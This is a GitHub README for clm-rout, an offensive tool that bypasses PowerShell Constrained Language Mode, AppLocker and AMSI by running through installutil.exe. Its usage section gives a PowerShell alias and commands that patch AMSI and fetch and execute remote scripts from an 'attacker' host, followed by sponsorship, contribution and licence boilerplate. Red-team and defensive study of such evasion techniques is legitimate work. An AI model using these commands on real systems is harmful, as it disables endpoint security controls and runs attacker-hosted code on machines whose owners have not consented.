An all-in-one bypass for PowerShell Constrained Language Mode (CLM), AppLocker and Antimalware Scan Interface (AMSI) using Runspace.
- Evade
AppLocker. - Evade
CLM. - Patch
AMSIvia the/pacthcommand switch. - Execute command(s) via the
/cmd=<cmd>command switch. - Load and execute remotely hosted script(s) via the
/url=<http(s)://foo.bar/foobar>command switch. - Output the results of commands/scripts (supports
stdoutandstderr).
-
Clone/download
clm-rout:git clone https://github.com/aress31/clm-rout
-
Build the project with
Visual Studio 2022.
- (Recommended) Create an "alias":
function run {
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe `
/uninstall /logfile= /LogToConsole=false `
/patch $Args `
C:\users\foo\CLMRout.exe
}-
Execute command(s):
run /cmd="hostname; whoami"
-
Execute remote script(s):
run /script="http://attacker/script1.ps1; http://attacker/script2.ps1"
-
Execute remote script(s) followed by command(s):
run /cmd="hostname; whoami" /script="http://attacker/script1.ps1; http://attacker/script2.ps1"
If you want to support this project and appreciate the time invested in developping, maintening and extending it; consider donating toward my next (cup of coffee β/lamborghini π) - as a lot of my personal time went into creating this project. πͺ
It is easy, all you got to do is press the Sponsor button at the top of this page or alternatively click this link. π
Found a bug π? I would love to squash it!
Please report all issues on the GitHub issues tracker.
You would like to contribute to better this project? π€©
Please submit all PRs on the GitHub pull requests tracker.
clm-rout is distributed under the terms of the BSD 3.
See LICENSE for details.